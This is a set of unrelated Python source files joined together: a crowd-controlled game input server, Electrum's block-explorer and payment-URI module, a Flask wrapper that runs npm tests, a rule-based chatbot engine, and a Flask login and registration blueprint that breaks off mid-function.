self.titlebar_label = tk.Label(self.mode_frame, text='Title Bar Name: ')
self.titlebar_label.grid(row=2, column=0, sticky='w')
self.titlebar_entry = ttk.Entry(self.mode_frame)
self.titlebar_entry.grid(row=2, column=1, sticky='ew')
self.interval_label = tk.Label(self.mode_frame, text='Democracy Interval: ')
self.interval_label.grid(row=3, column=0, sticky='w')
self.interval_entry = ttk.Entry(self.mode_frame)
self.interval_entry.grid(row=3, column=1, sticky='ew')
self.wrap_label = tk.Label(self.mode_frame, text='Wrap Keys: ')
self.wrap_label.grid(row=4, column=0, sticky='w')
self.wrap_entry = ttk.Entry(self.mode_frame)
self.wrap_entry.grid(row=4, column=1, sticky='ew')
self.status_label = tk.Label(self, text='Not Running')
self.status_label.grid(row=3, column=0, columnspan=2)
self.start_button = ttk.Button(self, text='Start', command=self.server.start)
self.start_button.grid(row=4, column=0, columnspan=2)
def start(self):
if self.deselected_screenshot is None:
pyautogui.alert(
text='You need to set a constant screenshot.', title='Screenshot', button='OK')
return
self.start_button.config(text='Stop', command=self.stop)
self.server.start()
def stop(self):
self.start_button.config(text='Start', command=self.start)
self.server.stop()
def take_screenshot(self):
def func():
self.screenshot_button.config(state='disabled')
for second in reversed(range(4)):
self.screenshot_label.config(
text='Deselect the game window %s' % second)
if second != 0:
time.sleep(1)
region = []
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place the mouse at the top left\nof the game\'s title bar %s' % second)
if second != 0:
time.sleep(1)
constant_top_left = pyautogui.position()
region.extend(constant_top_left)
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place the mouse at the bottom right\nof the game\'s title bar %s' % second)
if second != 0:
time.sleep(1)
constant_bottom_right = pyautogui.position()
region.extend(
(constant_bottom_right[0] - constant_top_left[0],
constant_bottom_right[1] - constant_top_left[1])
)
self.deselected_screenshot = pyautogui.screenshot(region=region)
pyautogui.click()
self.selected_screenshot = pyautogui.screenshot(region=region)
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place mouse at the top left\nof the entire game window %s' % second)
if second != 0:
time.sleep(1)
top_left = pyautogui.position()
for second in reversed(range(4)):
self.screenshot_label.config(
text='Place mouse at the bottom right\nof the entire game window %s' % second)
if second != 0:
time.sleep(1)
bottom_right = pyautogui.position()
self.screen_size = [
constant_top_left[0] - top_left[0],
constant_top_left[1] - top_left[1],
bottom_right[0] - constant_bottom_right[0],
bottom_right[1] - constant_bottom_right[1]
]
self.screenshot_taken = True
self.screenshot_label.config(text='Screenshot Taken')
self.screenshot_button.config(
state='normal', text='Retake Screenshot')
threading.Thread(target=func).start()
app = Flask(__name__)
socketio = SocketIO(app, async_mode='eventlet')
gui_server = PlayAsOne()
user_count = 0
users = {}
democracy = []
@app.route("/")
def hello():
print("User entered")
return render_template('index.html')
@socketio.on('connect', namespace="/")
def test_connect():
print('test ran')
@socketio.on("add user", namespace="/")
def handle_add_user(username):
global user_count
global gui_server
user_count += 1
user = username
print user
users[user] = {'input_count': 0}
emit("initialize", {
'input_type': gui_server.get_input_mode(), 'mode': gui_server.get_mode()})
def handle_chaos(user_input):
gui_server.send_key(user_input)
def handle_democracy(user_input):
global democracy
for demo_input in democracy:
if demo_input[0] == user_input:
print(demo_input)
demo_input[1] += 1
break
democracy.append([user_input, 1])
def execute_democracy():
global democracy
most_votes = ["", 0]
for user_input in democracy:
if user_input[1] > most_votes[1]:
most_votes = user_input
gui_server.send_key(most_votes[0])
democracy = []
@socketio.on('on disconnect', namespace="/")
def handle_disconnect(json):
global user_count
user_count -= 1
user = loads(json)
users.pop(user['username'])
@socketio.on("sendInput", namespace="/")
def handle_input(json):
user_input = json["user_input"]
print(user_input)
if user_input not in users:
users[user_input] = {'input_count': 0}
users[user_input]['input_count'] += 1
if (gui_server.get_mode() == 'Chaos'):
handle_chaos(user_input)
elif gui_server.get_mode() == 'Democracy':
handle_democracy(user_input)
gui_server.gui.mainloop()
|
web.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import decimal # Qt 5.12 also exports Decimal, so take the package name
import os
import re
import shutil
import sys
import threading
import urllib
from .address import Address
from . import bitcoin
from . import networks
from .util import format_satoshis_plain, bh2u, bfh, print_error, do_in_main_thread
from . import cashacct
from .i18n import _
DEFAULT_EXPLORER = "Blockchair.com"
mainnet_block_explorers = {
'Bitcoin.com': ('https://explorer.bitcoin.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'Blockchair.com': ('https://blockchair.com/bitcoin-cash',
Address.FMT_CASHADDR,
{'tx': 'transaction', 'addr': 'address', 'block' : 'block'}),
'BTC.com': ('https://bch.btc.com',
Address.FMT_CASHADDR,
{'tx': '', 'addr': '', 'block' : 'block'}),
'ViaBTC.com': ('https://explorer.viawallet.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'BlockExplorer.one': ('https://blockexplorer.one/bch/mainnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
'electroncash.de': ('https://explorer.electroncash.de',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Blockchain.com': ('https://www.blockchain.com/bch',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block'}),
}
DEFAULT_EXPLORER_TESTNET = 'Bitcoin.com'
testnet_block_explorers = {
'Bitcoin.com' : ('https://explorer.bitcoin.com/tbch',
Address.FMT_LEGACY, # For some reason testnet expects legacy and fails on bchtest: addresses.
{'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
'BlockExplorer.one': ('https://blockexplorer.one/bch/testnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
'electroncash.de': ('https://testnet-explorer.electroncash.de',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
'Blockchain.com': ('https://www.blockchain.com/bch-testnet',
Address.FMT_CASHADDR,
{'tx': 'tx', 'addr': 'address', 'block': 'block'}),
}
def BE_info():
if networks.net.TESTNET:
return testnet_block_explorers
return mainnet_block_explorers
def BE_tuple(config):
infodict = BE_info()
return (infodict.get(BE_from_config(config))
or infodict.get(BE_default_explorer()) # In case block explorer in config is bad/no longer valid
)
def BE_default_explorer():
return (DEFAULT_EXPLORER
if not networks.net.TESTNET
else DEFAULT_EXPLORER_TESTNET)
def BE_from_config(config):
return config.get('block_explorer', BE_default_explorer())
def BE_URL(config, kind, item):
be_tuple = BE_tuple(config)
if not be_tuple:
return
url_base, addr_fmt, parts = be_tuple
kind_str = parts.get(kind)
if kind_str is None:
return
if kind == 'addr':
assert isinstance(item, Address)
item = item.to_string(addr_fmt)
return "/".join(part for part in (url_base, kind_str, item) if part)
def BE_sorted_list():
return sorted(BE_info())
def _strip_cashacct_str(s: str) -> str:
'''Strips emojis and ';' characters from a cashacct string
of the form name#number[.123]'''
return cashacct.CashAcct.strip_emoji(s).replace(';', '').strip()
def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None, net=None):
is_cashacct = bool(isinstance(addr, str) and cashacct.CashAcct.parse_string(addr))
if not isinstance(addr, Address) and not is_cashacct:
return ""
if op_return is not None and op_return_raw is not None:
raise ValueError('Must specify exactly one of op_return or op_return_hex as kwargs to create_URI')
if is_cashacct:
scheme, path = cashacct.URI_SCHEME, _strip_cashacct_str(addr)
else:
scheme, path = addr.to_URI_components(net=net)
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
if op_return:
query.append(f'op_return={str(op_return)}')
if op_return_raw:
query.append(f'op_return_raw={str(op_return_raw)}')
p = urllib.parse.ParseResult(scheme=scheme,
netloc='', path=path, params='',
query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
def urlencode(s):
''' URL Encode; encodes a url or a uri fragment by %-quoting special chars'''
return urllib.parse.quote(s)
def urldecode(url):
''' Inverse of urlencode '''
return urllib.parse.unquote(url)
def parseable_schemes(net = None) -> tuple:
if net is None:
net = networks.net
return (net.CASHADDR_PREFIX, cashacct.URI_SCHEME)
class ExtraParametersInURIWarning(RuntimeWarning):
''' Raised by parse_URI to indicate the parsing succeeded but that
extra parameters were encountered when parsing.
args[0] is the function return value (dict of parsed args).
args[1:] are the URL parameters that were not understood (unknown params)'''
class DuplicateKeyInURIError(RuntimeError):
''' Raised on duplicate param keys in URI.
args[0] is a translated error message suitable for the UI
args[1:] is the list of duplicate keys. '''
class BadSchemeError(RuntimeError):
''' Raised if the scheme is bad/unknown for a URI. '''
class BadURIParameter(ValueError):
''' Raised if:
- 'amount' is not numeric,
- 'address' is invalid
- bad cashacct string,
- 'time' or 'exp' are not ints
args[0] is the bad argument name e.g. 'amount'
args[1] is the underlying Exception that was raised (if any, may be missing). '''
def parse_URI(uri, on_pr=None, *, net=None, strict=False, on_exc=None):
""" If strict=True, may raise ExtraParametersInURIWarning (see docstring
above).
on_pr - a callable that will run in the context of a daemon thread if this
is a payment request which requires further network processing. A single
argument is passed to the callable, the payment request after being verified
on the network. Note: as stated, this runs in the context of the daemon
thread, unlike on_exc below.
on_exc - (optional) a callable that will be executed in the *main thread*
only in the cases of payment requests and only if they fail to serialize or
deserialize. The callable must take 1 arg, a sys.exc_info() tuple. Note: as
stateed, this runs in the context of the main thread always, unlike on_pr
above.
May raise DuplicateKeyInURIError if duplicate keys were found.
May raise BadSchemeError if unknown scheme.
May raise Exception subclass on other misc. failure.
Returns a dict of uri_param -> value on success """
if net is None:
net = networks.net
if ':' not in uri:
# Test it's valid
Address.from_string(uri, net=net)
return {'address': uri}
u = urllib.parse.urlparse(uri, allow_fragments=False) # allow_fragments=False allows for cashacct:name#number URIs
# The scheme always comes back in lower case
accept_schemes = parseable_schemes(net=net)
if u.scheme not in accept_schemes:
raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes)))
address = u.path
is_cashacct = u.scheme == cashacct.URI_SCHEME
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query, keep_blank_values=True)
else:
pq = urllib.parse.parse_qs(u.query, keep_blank_values=True)
for k, v in pq.items():
if len(v) != 1:
raise DuplicateKeyInURIError(_('Duplicate key in URI'), k)
out = {k: v[0] for k, v in pq.items()}
if address:
if is_cashacct:
if '%' in address:
# on macOS and perhaps other platforms the '#' character may
# get passed-in as a '%23' if opened from a link or from
# some other source. The below call is safe and won't raise.
address = urldecode(address)
if not cashacct.CashAcct.parse_string(address):
raise BadURIParameter('address', ValueError(_("{acct_name} is not a valid cashacct string").format(acct_name=address)))
address = _strip_cashacct_str(address)
else:
# validate
try: Address.from_string(address, net=net)
except Exception as e: raise BadURIParameter('address', e) from e
out['address'] = address
if 'amount' in out:
try:
am = out['amount']
m = re.match(r'([0-9.]+)X([0-9]{2})', am)
if m:
k = int(m.group(2)) - 8
amount = decimal.Decimal(m.group(1)) * int(pow(10, k))
else:
amount = decimal.Decimal(am) * int(bitcoin.COIN)
out['amount'] = int(amount)
except (ValueError, decimal.InvalidOperation, TypeError) as e:
raise BadURIParameter('amount', e) from e
if strict and 'memo' in out and 'message' in out:
# these two args are equivalent and cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'memo', 'message')
elif 'message' in out:
out['memo'] = out['message']
elif 'memo' in out:
out['message'] = out['memo']
if 'time' in out:
try: out['time'] = int(out['time'])
except ValueError as e: raise BadURIParameter('time', e) from e
if 'exp' in out:
try: out['exp'] = int(out['exp'])
except ValueError as e: raise BadURIParameter('exp', e) from e
if 'sig' in out:
try: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
except Exception as e: raise BadURIParameter('sig', e) from e
if 'op_return_raw' in out and 'op_return' in out:
if strict:
# these two args cannot both appear together
raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'op_return', 'op_return_raw')
del out['op_return_raw'] # if not strict, just pick 1 and delete the other
if 'op_return_raw' in out:
# validate op_return_raw arg
try: bfh(out['op_return_raw'])
except Exception as e: raise BadURIParameter('op_return_raw', e) from e
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
is_pr = bool(r or (name and sig))
if is_pr and is_cashacct:
raise ValueError(_("'{uri_scheme}' payment requests are not currently supported").format(uri_scheme=cashacct.URI_SCHEME))
if on_pr and is_pr:
def get_payment_request_thread():
from . import paymentrequest as pr
try:
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
except:
''' May happen if the values in the request are such
that they cannot be serialized to a protobuf. '''
einfo = sys.exc_info()
print_error("Error processing payment request:", str(einfo[1]))
if on_exc:
do_in_main_thread(on_exc, einfo)
return
if on_pr:
# FIXME: See about also making this use do_in_main_thread.
# However existing code for Android and/or iOS may not be
# expecting this, so we will leave the original code here where
# it runs in the daemon thread context. :/
on_pr(request)
t = threading.Thread(target=get_payment_request_thread, daemon=True)
t.start()
if strict:
accept_keys = {'r', 'sig', 'name', 'address', 'amount', 'label', 'message', 'memo', 'op_return', 'op_return_raw', 'time', 'exp'}
extra_keys = set(out.keys()) - accept_keys
if extra_keys:
raise ExtraParametersInURIWarning(out, *tuple(extra_keys))
return out
def check_www_dir(rdir):
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|
server.py | from flask import Flask, render_template
import subprocess
import threading
app = Flask(__name__, template_folder=".", static_folder="assets")
# url_for('static', filename='assets')
def test_worker():
## Starting of the test
is_running = open('is_test_running','w')
is_running.write('True')
is_running.close()
cmd = ["npm","test"]
p = subprocess.Popen(cmd, stdout = subprocess.PIPE,stderr=subprocess.PIPE,
stdin=subprocess.PIPE)
out,err = p.communicate()
output_report = open('output.txt', 'w')
output_report.write(out)
output_report.close()
## End of the test
is_running = open('is_test_running','w')
is_running.write('False')
is_running.close()
@app.route("/")
def index():
return render_template('index.html')
@app.route("/get_report")
def hello():
is_running = open('is_test_running','r')
out = is_running.read()
is_running.close()
if out == 'False':
return render_template('mochawesome.html')
else:
return "Please wait test is running"
@app.route("/is_running")
def is_running():
is_running = open('is_test_running','r')
out = is_running.read()
is_running.close()
return out
@app.route("/run_test")
def run_test():
try:
is_running = open('is_test_running','r')
out = is_running.read()
is_running.close()
except:
threading.Thread(target=test_worker).start()
return "Background Thread Started"
if out == 'False':
threading.Thread(target=test_worker).start()
return "Background Thread Started"
else:
return "Test already running"
if __name__ == "__main__" :
app.run()
|
brain.py | from random import randint
import random
from Levenshtein import distance
from os import listdir
import json
from threading import Thread
from time import sleep
import time
from datetime import datetime
import re
# Import interface for basic convo file
from .utils import convo_reader
from .utils import story_reader
from .message_statistics import MessageStats
from .utils import sentiment
from .utils import iograb
# Get and instatiate knowledge graph object
from .knowledge_graph import KnowledgeGraph
knowledge = KnowledgeGraph()
# Config load
configFile = open('config.json')
raw_data = configFile.read()
data = json.loads(raw_data)
null_response = "None"
try:
null_response = data["null_response"]
except:
null_response = "None"
# Setup global objects
myIO = iograb.ClaraIO()
try:
if data['iomode'] == 'server':
port = 3000
try:
port = data['port']
except:
port = 3000
myIO = iograb.WebIO(port)
except:
doNothing = True
# Emotion load
emotionFile = open('emotions.json')
raw_data = emotionFile.read()
emotions = json.loads(raw_data)
emotionFile.close()
# Context load
try:
contextFile = open('context.json')
raw_data = contextFile.read()
context = json.loads(raw_data)
knowledge.loadContext(context)
contextFile.close()
except:
pass # Context file setup is not required
# Knowledge load
def load_knowledge():
global knowledge
knowledgeDir = data['knowledge_dir']
knowledgeFiles = listdir(data['knowledge_dir'])
for i in knowledgeFiles:
if i.endswith('.json'):
knowledgeFile = open(knowledgeDir + i)
raw_data = knowledgeFile.read()
knowledgeData = json.loads(raw_data)
knowledgeFile.close()
for q in knowledgeData['classifications']:
for j in q['classes']:
knowledge.addClassification(q['item'], j)
elif i.endswith('.knowledge'):
knowledgeFile = open(knowledgeDir + i)
raw_data = knowledgeFile.read()
for j in raw_data.split('\n'):
if len(j) > 0:
if j[0] == '#': # Comment line
continue
chunks = j.split('|')
for q in chunks[1].split(','):
knowledge.addClassification(chunks[0], q)
try:
load_knowledge()
except Exception as e:
print(e)
print('Knowledge load failed. Ensure you have the directory properly configured.')
convo = [] # Main array of all possible inputs and responses
analysisConvo = [] # Main arrow of diagnostic IO
# Var Setup
VAR_REGISTRY = {}
def build_registry():
global VAR_REGISTRY, convo, analysisConvo
VAR_REGISTRY = {
"user_name": data['user']['name'],
"name": data['name'],
"response_count": len(convo),
"user_hobby": data['user']['hobby'],
"happy_level": emotions['happy'],
"stress_level": emotions['stress'],
"animosity": emotions['animosity']
}
try:
VAR_REGISTRY['age'] = data['age']
except:
do_nothing = True
try:
VAR_REGISTRY['favorite_food'] = data['food']
except:
do_nothing = True
count = 0
for i in convo:
for j in i['starters']:
count += 1
VAR_REGISTRY['total_response_handles'] = count
feelings = json.load(open('feelings.json'))
for i in feelings:
VAR_REGISTRY[i['name']] = i['val']
# Add diagnostic info
toAdd = {
"starters": [ i['name'] + " level", "What is your " + i['name'] + "level?"],
"replies": [{ "text": "My " + i['name'] + " level is {" + i['name'] + "}." }]
}
convo += [toAdd]
analysisConvo += [toAdd]
# Finally add the current time to be updated every loop
VAR_REGISTRY['timeMilli'] = time.time()
now = datetime.now()
VAR_REGISTRY['hour'] = now.hour
VAR_REGISTRY['minute'] = now.minute
# Add all data to knowledge graph
knowledge.bulkPut(VAR_REGISTRY)
knowledge.addConnection('fulltime', [
{ 'type': 'connection', 'name': 'hour' },
{ 'type': 'string', 'text': ':' },
{ 'type': 'connection', 'name': 'minute' }
])
# Append all conversation response around distributed conversation files
# This allows one to "plug-in" new responses and have them centralized together
def load_convos():
global convo
convo = [] # Reset convos to prevent duplicates
convoDir = data['convo_dir']
convoFiles = listdir(data['convo_dir'])
# Replacement values
search = re.compile('%{.*}')
for i in convoFiles:
convo_json = []
if i.endswith('.json'):
convoFile = open(convoDir + i)
raw_data = convoFile.read()
convo_json = json.loads(raw_data)
elif i.endswith('.convo'):
# Process the loose file format
convoFile = open(convoDir + i)
raw_data = convoFile.read()
convo_json = convo_reader.convert_to_json(raw_data)
for i, value in enumerate(convo_json):
kill_list = []
for j, message in enumerate(value['starters']):
found = False
for match in re.finditer(search, message):
found = True
string = match.group(0)[2:-1]
for item in knowledge.classMembers(string):
convo_json[i]['starters'] += [message.replace(match.group(0), item)]
iters = 0
for q in kill_list: # Invariant: q always grows
del convo_json[i]['starters'][q - iters]
iters += 1
convo += convo_json
# Now load story convos
try:
storyFiles = listdir('stories/')
for i in storyFiles:
if i.endswith('.json'):
convo_json = story_reader.load_story('stories/' + i)
elif i.endswith('.story'):
convo_json = story_reader.load_storyfile('stories/' + i)
convo += convo_json
except:
pass
build_registry()
load_convos()
# Setup analysis mode
try:
analysisFile = open(data['convo_dir'] + 'diagnostics.convo')
raw_data = analysisFile.read()
analysisConvo += convo_reader.convert_to_json(raw_data)
except:
analysisConvo = []
def punctuation_stripper(statement):
toRemove = ['.', '!', '?']
punctuate = None
for i in toRemove:
if not statement.find(i) == -1:
punctuate = i
statement = statement.strip(i)
return {"text": statement, "punctuation": punctuate}
def handle_modifiers(modifiers):
for i in modifiers:
try:
VAR_REGISTRY[i['name']] += i['val']
knowledge.put(i['name'], i['val'])
except:
doNothing = True
def calc_qualifiers(qualifier):
#registryValue = VAR_REGISTRY[qualifier['name']]
registryValue = knowledge.get(qualifier['name'])
try:
if registryValue > qualifier['$gt']:
return True
else:
return False
except:
# Not a greater than qualifier
doNothing = True
try:
if registryValue == qualifier['$eq']:
return True
else:
return False
except:
# Not an equal to qualifier
doNothing = True
try:
if registryValue < qualifier['$lt']:
return True
else:
return False
except:
# Not a less than qualifier
doNothing = True
try:
if registryValue <= qualifier['$lte']:
return True
else:
return False
except:
# Not less than or equal qualifier
doNothing = True
try:
if registryValue >= qualifier['$gte']:
return True
else:
return False
except:
# Not greater than or equal qualifier
doNothing = True
# Legacy qualifier types
try:
if registryValue == qualifier['val']:
return True
else:
return False
except:
# Not a less than qualifier
doNothing = True
# if supplied info doesn't fit any of the above qualifier types reject
return False
# Pick a random option from supplied reply list using weights
def random_pick_weighted(reply_options):
context_responses = []
relevant_context = False
for i in reply_options:
try:
relevant = False
for j in i['context']:
if knowledge.contextSeparation(j['name']) == 1 or j['starting'] == True:
relevant = True
if not j['name'] == 'general' and knowledge.contextSeparation(j['name']) == 1:
relevant_context = True
context_responses += [i]
return i # Prevent this reply from failing to be sent despite being applicable
if len(i['context']) == 0:
relevant = True
if not relevant:
reply_options.remove(i)
except:
pass # Don't remove
if relevant_context:
reply_options = context_responses # Overwrite with narrowed responses
weights = list(map(lambda e: e['weight'], reply_options))
indexes = list(range(0, len(reply_options)))
# Generates a list with a single entry containing a value randomly picked with proper weight
if (len(indexes) == 0):
return -1
choices_list = random.choices(indexes, weights=weights, k=1)
picked_index = choices_list[0]
slimmed_reply = reply_options[picked_index]
return slimmed_reply
def get_response(input):
knowledge.updateContext() # Move previous context into the past
sentimentValues = sentiment.assess(input)
# Remove currently useless characters
stripped = punctuation_stripper(input)
input = stripped["text"]
punctuation = stripped["punctuation"]
possibilities = []
for i in convo:
for a in i['starters']:
val = distance(input, a)
if len(input)/(val+1) > 1.5:
reply_options = []
for b in i['replies']:
should_add = False
try:
to_test = b['qualifiers']
for z in to_test:
if calc_qualifiers(z):
should_add = True
else:
do_nothing = True
except:
should_add = True
if should_add:
to_add = {'text': b['text']}
try:
to_add['image'] = b['image']
except:
to_add['image'] = 'None'
try:
to_add['modifiers'] = b['modifiers']
except:
to_add['modifiers'] = []
try:
to_add['context'] = b['context']
except:
to_add['context'] = []
try:
to_add['weight'] = b['weight']
except:
to_add['weight'] = 1
reply_options += [to_add]
slimmed_reply = random_pick_weighted(reply_options)
if slimmed_reply == -1:
return { 'message': 'None' }
possibilities.append({
'val': val,
'response': slimmed_reply['text'],
'image': slimmed_reply['image'],
'weight': slimmed_reply['weight'],
'modifiers': slimmed_reply['modifiers'],
'context': slimmed_reply['context']
})
min = 10000000000
response = 'None'
image = 'None'
modifiers = []
contexts = []
found_close_context = -1
# print(possibilities)
CONTEXT_THRESHOLD = 1 # Steps away a context is still relevant
for i in possibilities:
if i['val'] < min:
contexts = i['context']
context_this_turn = False
for q in contexts:
separation = knowledge.contextSeparation(q['name'])
if separation == CONTEXT_THRESHOLD:
found_close_context = 1
context_this_turn = True
if (found_close_context == -1) or context_this_turn: # If context override close matching
response = i['response']
image = i['image']
modifiers = i['modifiers']
min = i['val']
handle_modifiers(modifiers)
# Update context waiting
for i in contexts:
# If kicking off or continuing the train
if i['starting'] == True or knowledge.contextSeparation(i['name']) == CONTEXT_THRESHOLD:
knowledge.newContext(i['name'])
knowledge.newContext('general') # This is a persistent context that enables something to always be selected
formatValues = knowledge.getRegistry()
toReturn = {'message': response.format(**formatValues), 'image': image}
return toReturn
input_queue = []
def threaded_input():
while True:
if len(input_queue) == 0:
newInput = myIO.get()
input_queue.append({ 'text': newInput['text'], 'session': newInput['session'] });
ticker = 0
events = json.load(open('events.json'))
for i in range(len(events)):
try:
metric = events[i]['metric']
#val = VAR_REGISTRY[metric]
val = knowledge.get(metric)
# Make the event support the multievent format
events[i]['metrics'] = [events[i]]
events[i]['metrics'][0]['last'] = val
except:
# Multitrigger event
metrics = events[i]['metrics']
for j in range(len(metrics)):
# val = VAR_REGISTRY[metrics[j]['metric']]
val = knowledge.get(metrics[j]['metric'])
events[i]['metrics'][j]['last'] = val
def event_check():
global ticker
ticker += 1
# Update time
VAR_REGISTRY['timeMilli'] = time.time()
knowledge.put('timeMilli', time.time());
now = datetime.now()
VAR_REGISTRY['hour'] = now.hour
knowledge.put('hour', now.hour);
VAR_REGISTRY['minute'] = now.minute
knowledge.put('minute', now.minute)
for i in range(len(events)):
triggers = events[i]['metrics']
# Innocent until proven guilty
isActivated = True
for j in range(len(triggers)):
metric = triggers[j]['metric']
#val = VAR_REGISTRY[metric]
val = knowledge.get(metric)
if val == None:
val = knowledge.contextSeparation(metric)
if triggers[j]['last']:
if triggers[j]['type'] == '$gt':
if not (val > triggers[j]['level'] and triggers[j]['last'] < val):
isActivated = False
elif triggers[j]['type'] == '$lt':
if not (val < triggers[j]['level'] and triggers[j]['last'] > val):
isActivated = False
elif triggers[j]['type'] == '$eq':
if not (val == triggers[j]['level'] and not triggers[j]['last'] == val):
isActivated = False
else:
isActivated = False
events[i]['metrics'][j]['last'] = val
if isActivated:
myIO.put(events[i]['response'])
# Runtime flags
analysisMode = False
def master_command(text):
global analysisMode
if text == 'analysis mode':
analysisMode = True
return True
return False
def run():
global convo, analysisMode, knowledge
logFile = open('log.txt', 'a')
secureLogger = MessageStats("secure_log.json")
secureLogger.load_log()
myIO.put("Booting...")
ioThread = Thread(target = threaded_input)
myIO.put("{} online.".format(data['name']))
ioThread.start()
terminated = False
while not terminated:
event_check()
if len(input_queue) > 0:
statement = input_queue[0]['text']
session = input_queue[0]['session']
del input_queue[0]
master_command(statement.lower())
if statement == 'reload':
load_knowledge()
load_convos()
myIO.put('Refreshing convos...', session)
continue
if not analysisMode:
response = get_response(statement.lower())
elif analysisMode:
backConvo = convo
convo = analysisConvo
response = get_response(statement.lower())
convo = backConvo
if not response['message'] == 'None':
myIO.put(response['message'], session)
else:
myIO.put(null_response, session)
secureLogger.log_occurence(response['message'])
ender = '\n'
logFile.write('Q: ' + statement + ender)
if not response == None:
logFile.write('R: ' + response['message'] + ender)
else:
logFile.write('R: None' + ender)
if statement == "quit":
print('Shutting down...')
terminated = True
sleep(0.1)
# Save context
contextFile = open('context.json', 'w')
contextFile.write(json.dumps(knowledge.dumpContext()))
contextFile.close()
# Save emotions
emotionFile = open('emotions.json', 'w')
emotionFile.write(json.dumps(emotions))
emotionFile.close()
secureLogger.save_log()
if __name__ == "__main__":
run()
|
routes.py | from . import users_blueprint
from flask import render_template, flash, abort, request, current_app, redirect, url_for
from .forms import RegistrationForm, LoginForm
from project.models import User
from project import database, mail
from sqlalchemy.exc import IntegrityError
from flask import escape
from flask_login import login_user, current_user, login_required, logout_user
from urllib.parse import urlparse
from flask_mail import Message
from flask import copy_current_request_context
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from itsdangerous.exc import BadSignature
from datetime import datetime
################
#### routes ####
################
@users_blueprint.route('/about')
def about():
flash('Thanks for learning about this site!', 'info')
return render_template('users/about.html', company_name='saidulislam.com')
@users_blueprint.route('/admin')
def admin():
abort(403)
@users_blueprint.errorhandler(403)
def page_forbidden(e):
return render_template('users/403.html'), 403
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.email.data, form.password.data)
database.session.add(new_user)
database.session.commit()
flash(f'Thanks for registering, {new_user.email}! Please check your email to confirm your email address.', 'success')
current_app.logger.info(f'Registered new user: {form.email.data}!')
@copy_current_request_context
def send_email(message):
with current_app.app_context():
mail.send(message)
# Send an email confirming the new registration - Updated!
msg = generate_confirmation_email(form.email.data)
email_thread = Thread(target=send_email, args=[msg])
email_thread.start()
return redirect(url_for('users.login'))
except IntegrityError:
database.session.rollback()
flash(f'ERROR! Email ({form.email.data}) already exists.', 'error')
else:
flash(f"Error in form data!")
return render_template('users/register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
# If the user is already logged in, don't allow them to try to log in again
if current_user.is_authenticated:
flash('Already logged in!')
current_app.logger.info(f'Duplicate login attempt by user: {current_user.email}')
return redirect(url_for('stocks.index'))
form = LoginForm()
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and user.is_password_correct(form.password.data):
# User's credentials have been validated, so log them in
login_user(user, remember=form.remember_me.data)
flash(f'Thanks for logging in, {current_user.email}!')
current_app.logger.info(f'Logged in user: {current_user.email}')
# If the next URL is not specified, redirect to the user profile - NEW!!
if not request.args.get('next'):
return redirect(url_for('users.user_profile'))
# Process the query to determine if the user should be redirected after logging in - NEW!!
next_url = request.args.get('next')
